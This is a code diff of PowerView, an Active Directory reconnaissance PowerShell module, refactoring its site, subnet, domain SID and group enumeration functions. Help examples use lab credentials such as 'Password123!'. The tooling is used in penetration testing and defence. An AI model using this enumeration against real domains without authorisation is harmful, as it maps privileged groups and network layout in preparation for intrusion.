-        Domain controller to reflect LDAP queries through.
+.PARAMETER Credential
 
-    .PARAMETER ADSpath
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        The LDAP source to search through.
+.PARAMETER Raw
 
-    .PARAMETER FullData
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-        Switch. Return full OU objects instead of just object names (the default).
+.EXAMPLE
 
-    .PARAMETER PageSize
+Get-DomainSite
 
-        The PageSize to set for the LDAP searcher object.
+Returns the current sites in the domain.
 
-    .PARAMETER Credential
+.EXAMPLE
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Get-DomainSite *admin* -Domain testlab.local
 
-    .EXAMPLE
+Returns all sites with "admin" in their name in the testlab.local domain.
 
-        PS C:\> Get-NetOU
-        
-        Returns the current OUs in the domain.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
 
-        PS C:\> Get-NetOU -OUName *admin* -Domain testlab.local
-        
-        Returns all OUs with "admin" in their name in the testlab.local domain.
+Returns all sites with linked to the specified group policy object.
 
-     .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetOU -GUID 123-...
-        
-        Returns all OUs with linked to the specified group policy object.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSite -Credential $Cred
 
-     .EXAMPLE
+.OUTPUTS
 
-        PS C:\> "*admin*","*server*" | Get-NetOU
+PowerView.Site
 
-        Get the full OU names for the given search terms piped on the pipeline.
+Custom PSObject with translated site property fields.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.Site')]
     [CmdletBinding()]
     Param (
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $OUName = '*',
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [String[]]
+        $Identity,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $GUID,
+        [Alias('GUID')]
+        $GPLink,
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $DomainController,
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $ADSpath,
+        $SearchBase,
 
-        [Switch]
-        $FullData,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [Switch]
+        $Raw
     )
 
-    begin {
-        $OUSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+    BEGIN {
+        $SearcherArguments = @{
+            'SearchBasePrefix' = 'CN=Sites,CN=Configuration'
+        }
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $SiteSearcher = Get-DomainSearcher @SearcherArguments
     }
-    process {
-        if ($OUSearcher) {
-            if ($GUID) {
-                # if we're filtering for a GUID in .gplink
-                $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName)(gplink=*$GUID*))"
-            }
-            else {
-                $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName))"
-            }
 
-            try {
-                $Results = $OUSearcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    if ($FullData) {
-                        # convert/process the LDAP fields for each result
-                        $OU = Convert-LDAPProperty -Properties $_.Properties
-                        $OU.PSObject.TypeNames.Add('PowerView.OU')
-                        $OU
+    PROCESS {
+        if ($SiteSearcher) {
+            $IdentityFilter = ''
+            $Filter = ''
+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^CN=.*') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                else {
+                    try {
+                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+                        $IdentityFilter += "(objectguid=$GuidByteString)"
                     }
-                    else { 
-                        # otherwise just returning the ADS paths of the OUs
-                        $_.properties.adspath
+                    catch {
+                        $IdentityFilter += "(name=$IdentityInstance)"
                     }
                 }
-                $Results.dispose()
-                $OUSearcher.dispose()
             }
-            catch {
-                Write-Warning $_
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
+            }
+
+            if ($PSBoundParameters['GPLink']) {
+                Write-Verbose "[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property"
+                $Filter += "(gplink=*$GPLink*)"
             }
+
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainSite] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
+            }
+
+            $SiteSearcher.filter = "(&(objectCategory=site)$Filter)"
+            Write-Verbose "[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)"
+
+            if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() }
+            else { $Results = $SiteSearcher.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                if ($PSBoundParameters['Raw']) {
+                    # return raw result objects
+                    $Site = $_
+                }
+                else {
+                    $Site = Convert-LDAPProperty -Properties $_.Properties
+                }
+                $Site.PSObject.TypeNames.Insert(0, 'PowerView.Site')
+                $Site
+            }
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainSite] Error disposing of the Results object"
+                }
+            }
+            $SiteSearcher.dispose()
         }
     }
 }
 
 
-function Get-NetSite {
+function Get-DomainSubnet {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Gets a list of all current sites in a domain.
+Search for all subnets or specific subnets objects in AD.
 
-    .PARAMETER SiteName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty  
 
-        Site filter string, wildcards accepted.
+.DESCRIPTION
 
-    .PARAMETER Domain
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties whencreated,usnchanged,...". By default, all subnet objects for
+the current domain are returned.
 
-        The domain to query for sites, defaults to the current domain.
+.PARAMETER Identity
 
-    .PARAMETER DomainController
+An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
+or GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER SiteName
 
-    .PARAMETER ADSpath
+Only return subnets from the specified SiteName.
 
-        The LDAP source to search through.
+.PARAMETER Domain
 
-    .PARAMETER GUID
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Only return site with the specified GUID in their gplink property.
+.PARAMETER LDAPFilter
 
-    .PARAMETER FullData
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        Switch. Return full site objects instead of just object names (the default).
+.PARAMETER Properties
 
-    .PARAMETER PageSize
+Specifies the properties of the output object to retrieve from the server.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER SearchBase
 
-    .PARAMETER Credential
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER Server
 
-    .EXAMPLE
+Specifies an Active Directory server (domain controller) to bind to.
 
-        PS C:\> Get-NetSite -Domain testlab.local -FullData
-        
-        Returns the full data objects for all sites in testlab.local
-#>
+.PARAMETER SearchScope
 
-    [CmdletBinding()]
-    Param (
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $SiteName = "*",
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        [String]
-        $Domain,
+.PARAMETER ResultPageSize
 
-        [String]
-        $DomainController,
+Specifies the PageSize to set for the LDAP searcher object.
 
-        [String]
-        $ADSpath,
+.PARAMETER ServerTimeLimit
 
-        [String]
-        $GUID,
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        [Switch]
-        $FullData,
+.PARAMETER SecurityMasks
 
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200,
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-        [Management.Automation.PSCredential]
-        $Credential
-    )
+.PARAMETER Tombstone
 
-    begin {
-        $SiteSearcher = Get-DomainSearcher -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSprefix "CN=Sites,CN=Configuration" -PageSize $PageSize
-    }
-    process {
-        if($SiteSearcher) {
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-            if ($GUID) {
-                # if we're filtering for a GUID in .gplink
-                $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName)(gplink=*$GUID*))"
-            }
-            else {
-                $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName))"
-            }
-            
-            try {
-                $Results = $SiteSearcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    if ($FullData) {
-                        # convert/process the LDAP fields for each result
-                        $Site = Convert-LDAPProperty -Properties $_.Properties
-                        $Site.PSObject.TypeNames.Add('PowerView.Site')
-                        $Site
-                    }
-                    else {
-                        # otherwise just return the site name
-                        $_.properties.name
-                    }
-                }
-                $Results.dispose()
-                $SiteSearcher.dispose()
-            }
-            catch {
-                Write-Verbose $_
-            }
-        }
-    }
-}
+.PARAMETER FindOne
 
+Only return one result object.
 
-function Get-NetSubnet {
-<#
-    .SYNOPSIS
-
-        Gets a list of all current subnets in a domain.
-
-    .PARAMETER SiteName
+.PARAMETER Credential
 
-        Only return subnets from the specified SiteName.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER Domain
+.PARAMETER Raw
 
-        The domain to query for subnets, defaults to the current domain.
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-    .PARAMETER DomainController
+.EXAMPLE
 
-        Domain controller to reflect LDAP queries through.
+Get-DomainSubnet
 
-    .PARAMETER ADSpath
+Returns the current subnets in the domain.
 
-        The LDAP source to search through.
+.EXAMPLE
 
-    .PARAMETER FullData
+Get-DomainSubnet *admin* -Domain testlab.local
 
-        Switch. Return full subnet objects instead of just object names (the default).
+Returns all subnets with "admin" in their name in the testlab.local domain.
 
-    .PARAMETER PageSize
+.EXAMPLE
 
-        The PageSize to set for the LDAP searcher object.
+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
 
-    .PARAMETER Credential
+Returns all subnets with linked to the specified group policy object.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.EXAMPLE
 
-    .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSubnet -Credential $Cred
 
-        PS C:\> Get-NetSubnet
-        
-        Returns all subnet names in the current domain.
+.OUTPUTS
 
-    .EXAMPLE
+PowerView.Subnet
 
-        PS C:\> Get-NetSubnet -Domain testlab.local -FullData
-        
-        Returns the full data objects for all subnets in testlab.local
+Custom PSObject with translated subnet property fields.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.Subnet')]
     [CmdletBinding()]
     Param (
-        [Parameter(ValueFromPipeline=$True)]
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [String[]]
+        $Identity,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $SiteName = "*",
+        $SiteName,
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $ADSpath,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
 
-        [Switch]
-        $FullData,
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [Switch]
+        $Raw
     )
 
-    begin {
-        $SubnetSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -ADSprefix "CN=Subnets,CN=Sites,CN=Configuration" -PageSize $PageSize
+    BEGIN {
+        $SearcherArguments = @{
+            'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration'
+        }
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $SubnetSearcher = Get-DomainSearcher @SearcherArguments
     }
 
-    process {
-        if($SubnetSearcher) {
+    PROCESS {
+        if ($SubnetSearcher) {
+            $IdentityFilter = ''
+            $Filter = ''
+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^CN=.*') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                else {
+                    try {
+                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+                        $IdentityFilter += "(objectguid=$GuidByteString)"
+                    }
+                    catch {
+                        $IdentityFilter += "(name=$IdentityInstance)"
+                    }
+                }
+            }
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
+            }
 
-            $SubnetSearcher.filter="(&(objectCategory=subnet))"
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
+            }
 
-            try {
-                $Results = $SubnetSearcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    if ($FullData) {
-                        # convert/process the LDAP fields for each result
-                        Convert-LDAPProperty -Properties $_.Properties | Where-Object { $_.siteobject -match "CN=$SiteName" }
-                    }
-                    else {
-                        # otherwise just return the subnet name and site name
-                        if ( ($SiteName -and ($_.properties.siteobject -match "CN=$SiteName,")) -or ($SiteName -eq '*')) {
+            $SubnetSearcher.filter = "(&(objectCategory=subnet)$Filter)"
+            Write-Verbose "[Get-DomainSubnet] Get-DomainSubnet filter string: $($SubnetSearcher.filter)"
 
-                            $SubnetProperties = @{
-                                'Subnet' = $_.properties.name[0]
-                            }
-                            try {
-                                $SubnetProperties['Site'] = ($_.properties.siteobject[0]).split(",")[0]
-                            }
-                            catch {
-                                $SubnetProperties['Site'] = 'Error'
-                            }
+            if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() }
+            else { $Results = $SubnetSearcher.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                if ($PSBoundParameters['Raw']) {
+                    # return raw result objects
+                    $Subnet = $_
+                }
+                else {
+                    $Subnet = Convert-LDAPProperty -Properties $_.Properties
+                }
+                $Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet')
 
-                            New-Object -TypeName PSObject -Property $SubnetProperties
-                        }
+                if ($PSBoundParameters['SiteName']) {
+                    # have to do the filtering after the LDAP query as LDAP doesn't let you specify
+                    #   wildcards for 'siteobject' :(
+                    if ($Subnet.properties -and ($Subnet.properties.siteobject -like "*$SiteName*")) {
+                        $Subnet
                     }
+                    elseif ($Subnet.siteobject -like "*$SiteName*") {
+                        $Subnet
+                    }
+                }
+                else {
+                    $Subnet
                 }
-                $Results.dispose()
-                $SubnetSearcher.dispose()
             }
-            catch {
-                Write-Warning $_
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainSubnet] Error disposing of the Results object: $_"
+                }
             }
+            $SubnetSearcher.dispose()
         }
     }
 }
@@ -5010,244 +8256,459 @@ function Get-NetSubnet {
 
 function Get-DomainSID {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns the SID for the current domain or the specified domain.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer  
+
+.DESCRIPTION
+
+Returns the SID for the current domain or the specified domain by executing
+Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
+to search for domain controllers through LDAP. The SID of the returned domain controller
+is then extracted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER Server
 
-        Gets the SID for the domain.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER Domain
+.PARAMETER Credential
 
-        The domain to query, defaults to the current domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER DomainController
+.EXAMPLE
 
-        Domain controller to reflect LDAP queries through.
+Get-DomainSID
 
-    .EXAMPLE
+.EXAMPLE
 
-        C:\> Get-DomainSID -Domain TEST
-        
-        Returns SID for the domain 'TEST'
+Get-DomainSID -Domain testlab.local
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSID -Credential $Cred
+
+.OUTPUTS
+
+String
+
+A string representing the specified domain SID.
 #>
 
-    param(
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([String])]
+    [CmdletBinding()]
+    Param(
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController
+        $Server,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $DCSID = Get-NetComputer -Domain $Domain -DomainController $DomainController -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | Select-Object -First 1 -ExpandProperty objectsid
-    if($DCSID) {
-        $DCSID.Substring(0, $DCSID.LastIndexOf('-'))
+    $SearcherArguments = @{
+        'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+    }
+    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+    $DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid
+
+    if ($DCSID) {
+        $DCSID.SubString(0, $DCSID.LastIndexOf('-'))
     }
     else {
-        Write-Verbose "Error extracting domain SID for $Domain"
+        Write-Verbose "[Get-DomainSID] Error extracting domain SID for '$Domain'"
     }
 }
 
 
-function Get-NetGroup {
+function Get-DomainGroup {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Return all groups or specific group objects in AD.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty  
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all group objects for
+the current domain are returned. To return the groups a specific user/group is
+a part of, use -MemberIdentity X to execute token groups enumeration.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for. Wildcards accepted.
+
+.PARAMETER MemberIdentity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the user/group member to query for group membership.
+
+.PARAMETER AdminCount
+
+Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
 
-        Gets a list of all current groups in a domain, or all
-        the groups a given user/group object belongs to.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-    .PARAMETER GroupName
+.PARAMETER Server
 
-        The group name to query for, wildcards accepted.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER SID
+.PARAMETER SearchScope
 
-        The group SID to query for.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER UserName
+.PARAMETER ResultPageSize
 
-        The user name (or group name) to query for all effective
-        groups of.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER Filter
+.PARAMETER ServerTimeLimit
 
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER Domain
+.PARAMETER SecurityMasks
 
-        The domain to query for groups, defaults to the current domain.
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-    .PARAMETER DomainController
+.PARAMETER Tombstone
 
-        Domain controller to reflect LDAP queries through.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER ADSpath
+.PARAMETER FindOne
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Only return one result object.
 
-    .PARAMETER AdminCount
+.PARAMETER Credential
 
-        Switch. Return group with adminCount=1.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER FullData
+.PARAMETER Raw
 
-        Switch. Return full group objects instead of just object names (the default).
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-    .PARAMETER RawSids
+.EXAMPLE
 
-        Switch. Return raw SIDs when using "Get-NetGroup -UserName X"
+Get-DomainGroup | select samaccountname
 
-    .PARAMETER PageSize
+samaccountname
+--------------
+WinRMRemoteWMIUsers__
+Administrators
+Users
+Guests
+Print Operators
+Backup Operators
+...
 
-        The PageSize to set for the LDAP searcher object.
+.EXAMPLE
 
-    .PARAMETER Credential
+Get-DomainGroup *admin* | select distinguishedname
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+distinguishedname
+-----------------
+CN=Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Schema Admins,CN=Users,DC=testlab,DC=local
+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+CN=Domain Admins,CN=Users,DC=testlab,DC=local
+CN=DnsAdmins,CN=Users,DC=testlab,DC=local
+CN=Server Admins,CN=Users,DC=testlab,DC=local
+CN=Desktop Admins,CN=Users,DC=testlab,DC=local
 
-    .PARAMETER AllTypes
+.EXAMPLE
 
-        By default we will retrieve only Security, not Distribution Groups.
+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
 
-    .EXAMPLE
+samaccountname
+--------------
+Server Admins
 
-        PS C:\> Get-NetGroup
+.EXAMPLE
 
-        Returns the current security groups in the domain.
+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
 
-    .EXAMPLE
+usncreated            : 13245
+grouptype             : -2147483646
+samaccounttype        : 268435456
+samaccountname        : Desktop Admins
+whenchanged           : 8/10/2016 12:30:30 AM
+objectsid             : S-1-5-21-890171859-3433809279-3366196753-1118
+objectclass           : {top, group}
+cn                    : Desktop Admins
+usnchanged            : 13255
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+name                  : Desktop Admins
+distinguishedname     : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+member                : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+whencreated           : 8/10/2016 12:29:43 AM
+instancetype          : 4
+objectguid            : f37903ed-b333-49f4-abaa-46c65e9cca71
+objectcategory        : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
 
-        PS C:\> Get-NetGroup -GroupName *admin*
+.EXAMPLE
 
-        Returns all groups with "admin" in their group name.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroup -Credential $Cred
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetGroup -Domain testing -FullData
+Get-Domain | Select-Object -Expand name
+testlab.local
 
-        Returns full group data objects in the 'testing' domain
+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
+
+distinguishedname
+-----------------
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+.OUTPUTS
+
+PowerView.Group
+
+Custom PSObject with translated group property fields.
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $GroupName = '*',
